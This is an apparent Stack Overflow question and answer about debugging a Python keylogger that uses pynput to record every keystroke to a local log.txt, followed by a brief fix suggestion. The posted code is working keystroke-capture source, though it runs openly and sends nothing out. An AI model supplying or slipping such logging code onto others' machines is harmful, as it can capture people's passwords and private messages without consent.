# Trying to append a text file with a key logger

Tags: python, text

I am trying to create a keylogger so that when it is run, it appends all of the logged keys to a text file. Currently, it is logging all of the keys but it is not appending to the set text file.

```
import pynput

from pynput.keyboard import Key, Listener

count = 0
keys = []


def on_press(key):
  global keys, count

  keys.append(key)
  count += 1
  print("{0} pressed".format(key))

  if count >= 10: 
    count = 0
    write_file(str(keys))
    keys = []

def write_file(keys):
  with open("log.txt","a") as f:
    for key in keys:
      f.write(str(key))


def on_release(key):
  if key == Key.esc:
    return False

with Listener(on_press=on_press, on_release=on_release) as listener:
  listener.join()
```

Answer (score 0):

Try removing `str` around `keys` that you're giving to your `write_file` function.

Like that:

```py
write_file(keys)
```

When you `str` a list, you get the whole list as a string...